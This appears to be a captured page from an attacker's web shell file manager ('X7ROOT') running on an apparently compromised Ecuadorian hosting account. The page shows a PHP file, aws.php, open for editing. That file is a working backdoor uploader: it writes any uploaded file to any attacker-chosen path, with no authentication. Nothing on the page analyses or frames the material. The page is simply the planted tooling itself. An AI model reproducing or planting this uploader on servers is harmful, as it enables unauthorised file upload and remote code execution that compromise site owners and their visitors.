X7ROOT File Manager
PHP:
8.2.33
OS:
Linux
User:
freenet1
Root
/
home
/
freenet1
/
public_html
/
freedata.freenet.com.ec
📤 Upload
📝 New File
📁 New Folder
Close
Editing: aws.php
<?php $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>OK Your File Has Been Uploaded !</a></h1>"; } }echo '<html><head><title>Upload Your files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>'; ?>
Save
Cancel